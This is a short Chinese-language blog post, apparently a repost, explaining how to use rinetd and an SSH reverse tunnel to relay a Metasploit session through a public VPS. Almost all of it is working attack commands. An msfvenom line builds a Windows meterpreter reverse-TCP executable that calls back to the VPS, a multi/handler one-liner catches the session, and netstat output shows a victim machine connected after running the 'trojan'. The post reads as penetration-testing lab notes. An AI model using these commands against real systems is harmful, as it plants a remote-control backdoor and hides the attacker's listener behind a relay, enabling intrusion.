rinetd 使用

admin 2024年4月4日11:31:49评论0 views字数 528阅读1分45秒阅读模式

配置情况

  • 本地metasploit机器: 192.168.3.23
  • 公网VPS: 181.122.37.15
  • 内网靶机: 192.168.109.143

本地执行:

1
ssh -N -f -R 8201:192.168.3.23:8201 [email protected]

服务器rinetd配置:

1
2
3
vim /etc/rinetd.conf ## 配置
0.0.0.0 8022 127.0.0.1 8201
rinetd -c /etc/rinetd.conf

本地执行:

1
2
3
msfvenom -p windows/meterpreter/reverse_tcp LHOST=181.122.37.15 lport=8022 -f exe >181.122.37.15_8022.exe

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost 192.168.3.23;set lport 8201;run -j"

执行木马后受害机器网络连接:

1
TCP    192.168.109.143:49776  181.122.37.15:8022        ESTABLISHED     3128

- source:wolvez.club

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月4日11:31:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   rinetd 使用http://cn-sec.com/archives/2629199.html

发表评论

匿名网友 填写信息